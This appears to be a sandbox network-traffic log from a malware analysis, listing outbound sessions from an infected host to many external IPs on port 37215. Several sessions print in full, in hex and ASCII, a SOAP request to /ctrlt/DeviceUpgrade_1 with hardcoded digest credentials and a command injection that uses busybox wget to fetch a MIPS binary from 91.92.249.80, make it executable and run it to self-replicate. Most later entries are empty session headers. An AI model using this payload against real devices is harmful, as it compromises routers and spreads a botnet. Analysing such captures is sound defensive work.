                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2515192.168.2.235808841.220.34.13737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.717262030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2516192.168.2.2356794216.105.237.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:08.738503933 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2517192.168.2.23540262.237.174.9337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:08.738507032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2518192.168.2.2353484157.40.55.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:08.739222050 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2519192.168.2.2346072195.109.204.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:08.739247084 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2520192.168.2.2358178197.40.84.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:08.739279032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2521192.168.2.2352292197.241.152.12137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:08.739355087 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2522192.168.2.235493485.119.236.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2523192.168.2.2340454197.225.51.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2524192.168.2.2350644157.62.234.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2525192.168.2.2359026157.244.33.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2526192.168.2.235812041.142.188.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2527192.168.2.2346022201.247.105.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2528192.168.2.2350730103.33.254.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2529192.168.2.233552241.193.176.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2530192.168.2.2342900197.81.216.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2531192.168.2.235551687.9.153.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2532192.168.2.2351694157.254.50.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2533192.168.2.234403641.215.250.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2534192.168.2.2335858193.215.44.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2535192.168.2.2338488157.3.129.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2536192.168.2.234440266.156.166.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2537192.168.2.2345124197.98.21.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2538192.168.2.2340348192.209.191.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2539192.168.2.233468472.164.186.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2540192.168.2.2345158157.156.170.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2541192.168.2.235223038.230.234.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2542192.168.2.234497641.165.187.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2543192.168.2.2339174197.187.248.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2544192.168.2.2358404157.148.99.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2545192.168.2.235121268.242.17.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2546192.168.2.2357764197.186.143.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2547192.168.2.2352492157.124.239.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2548192.168.2.2353108157.82.115.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2549192.168.2.2355054144.158.127.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2550192.168.2.234335241.123.176.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2551192.168.2.2341922197.180.31.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2552192.168.2.2343356197.155.248.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2553192.168.2.2342968108.46.98.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2554192.168.2.2359076197.208.76.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2555192.168.2.2346306157.134.9.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2556192.168.2.2334458197.207.167.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2557192.168.2.2358466197.117.106.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2558192.168.2.234455241.201.62.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2559192.168.2.234922641.16.95.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2560192.168.2.2356578145.53.171.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2561192.168.2.2339416180.64.217.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2562192.168.2.2341326207.159.71.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2563192.168.2.234292894.238.84.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2564192.168.2.234246041.42.133.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2565192.168.2.233408259.115.42.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2566192.168.2.2352176117.206.83.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2567192.168.2.2343270157.47.136.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2568192.168.2.2360012115.25.197.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2569192.168.2.234308289.255.205.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2570192.168.2.2336018159.208.228.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2571192.168.2.235929241.73.221.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2572192.168.2.2336430157.133.227.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2573192.168.2.233719841.38.219.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2574192.168.2.2348524157.149.138.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2575192.168.2.2353220197.178.47.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2576192.168.2.235867441.215.223.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2577192.168.2.2351588197.48.147.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2578192.168.2.2335240197.12.170.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2579192.168.2.233545841.129.83.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2580192.168.2.2356404107.92.95.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2581192.168.2.2353946219.139.77.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2582192.168.2.2336002197.177.221.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2583192.168.2.234596241.171.37.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2584192.168.2.235766641.195.175.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2585192.168.2.2343100157.173.38.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2586192.168.2.2357408197.85.90.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2587192.168.2.2345116157.176.53.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2588192.168.2.234495641.247.14.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2589192.168.2.2346236197.248.215.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2590192.168.2.234220483.82.70.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2591192.168.2.233864241.241.249.23237215
